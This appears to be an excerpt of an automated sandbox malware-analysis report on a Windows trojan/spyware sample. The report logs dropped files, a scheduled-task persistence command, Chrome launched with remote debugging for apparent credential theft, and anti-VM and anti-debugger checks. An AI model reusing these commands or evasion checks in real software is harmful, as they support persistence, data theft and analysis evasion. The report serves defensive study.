Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C84EE50 9_2_6C84EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C850FC0 9_2_6C850FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C890AC0 9_2_6C890AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8544F0 9_2_6C8544F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8846E0 9_2_6C8846E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8787C0 9_2_6C8787C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8807D0 9_2_6C8807D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C882090 9_2_6C882090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C890060 9_2_6C890060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C872360 9_2_6C872360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C89DC70 9_2_6C89DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C855880 9_2_6C855880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8798F0 9_2_6C8798F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C887A20 9_2_6C887A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88DBEE 9_2_6C88DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88140E 9_2_6C88140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C891510 9_2_6C891510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88F610 9_2_6C88F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C86F760 9_2_6C86F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C9050D0 9_2_6C9050D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8570C0 9_2_6C8570C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C843000 9_2_6C843000
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 588990BA03C40D8FA04671C882E1BF46773A14AC6AA8E15A556FFEBC18D82EEA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C913560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C915980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C913820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C915A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C9136E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C913B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C90ADB0 appears 49 times
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7996 -s 1236
Source: u25XzKsRuY.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: u25XzKsRuY.exe Static PE information: Section: syhqkjwe ZLIB complexity 0.9944963005250288
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/7@16/5
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:892:120:WilError_03
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7996
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.1722908239.0000350C00535000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: u25XzKsRuY.exe Virustotal: Detection: 54%
Source: u25XzKsRuY.exe ReversingLabs: Detection: 63%
Source: unknown Process created: C:\Users\user\Desktop\u25XzKsRuY.exe "C:\Users\user\Desktop\u25XzKsRuY.exe"
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2132,i,4658029953640130748,9299250250525862020,262144 /prefetch:8
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7996 -s 1236
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2132,i,4658029953640130748,9299250250525862020,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: u25XzKsRuY.exe Static file information: File size 4429824 > 1048576
Source: u25XzKsRuY.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: u25XzKsRuY.exe Static PE information: Raw size of syhqkjwe is bigger than: 0x100000 < 0x1b2800
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00208230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00208230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: u25XzKsRuY.exe Static PE information: real checksum: 0x44957c should be: 0x444461
Source: u25XzKsRuY.exe Static PE information: section name:
Source: u25XzKsRuY.exe Static PE information: section name: .idata
Source: u25XzKsRuY.exe Static PE information: section name:
Source: u25XzKsRuY.exe Static PE information: section name: syhqkjwe
Source: u25XzKsRuY.exe Static PE information: section name: kcefumhe
Source: u25XzKsRuY.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0020A521 push es; iretd 9_2_0020A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8F0C30 push eax; mov dword ptr [esp], edi 9_2_6C8F0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8BED10 push eax; mov dword ptr [esp], ebx 9_2_6C8BEE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C894E31 push eax; mov dword ptr [esp], ebx 9_2_6C894E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C888E7A push edx; mov dword ptr [esp], ebx 9_2_6C888E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88A947 push eax; mov dword ptr [esp], ebx 9_2_6C88A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C892AAC push edx; mov dword ptr [esp], ebx 9_2_6C892AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8A8AA0 push eax; mov dword ptr [esp], ebx 9_2_6C8A909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C890AA2 push eax; mov dword ptr [esp], ebx 9_2_6C890AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8BEAB0 push eax; mov dword ptr [esp], ebx 9_2_6C8BEBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2BF0 push eax; mov dword ptr [esp], ebx 9_2_6C8C2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2BF0 push edx; mov dword ptr [esp], ebx 9_2_6C8C2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88048B push eax; mov dword ptr [esp], ebx 9_2_6C8804A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8804E0 push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C888435 push edx; mov dword ptr [esp], ebx 9_2_6C888449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8A8460 push eax; mov dword ptr [esp], ebx 9_2_6C8A8A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88A5A7 push eax; mov dword ptr [esp], ebx 9_2_6C88A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C861CFA push eax; mov dword ptr [esp], ebx 9_2_6C916622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C861CFA push eax; mov dword ptr [esp], ebx 9_2_6C916622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8986A1 push 890005EAh; ret 9_2_6C8986A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8806A2 push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8806A6 push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8D06B0 push eax; mov dword ptr [esp], ebx 9_2_6C8D0A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8806FD push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8866F3 push edx; mov dword ptr [esp], ebx 9_2_6C886707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2620 push eax; mov dword ptr [esp], ebx 9_2_6C8C2954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C2620 push edx; mov dword ptr [esp], ebx 9_2_6C8C2973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88070E push eax; mov dword ptr [esp], ebx 9_2_6C8806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C88A777 push eax; mov dword ptr [esp], ebx 9_2_6C88A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C85E0D0 push eax; mov dword ptr [esp], ebx 9_2_6C916AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C85E0D0 push edx; mov dword ptr [esp], edi 9_2_6C916B36
Source: u25XzKsRuY.exe Static PE information: section name: syhqkjwe entropy: 7.955673958083564
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 11C0279 second address: 11C027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 11C027F second address: 11C0284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 11C0284 second address: 11C0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64821h 0x00000009 rdtsc
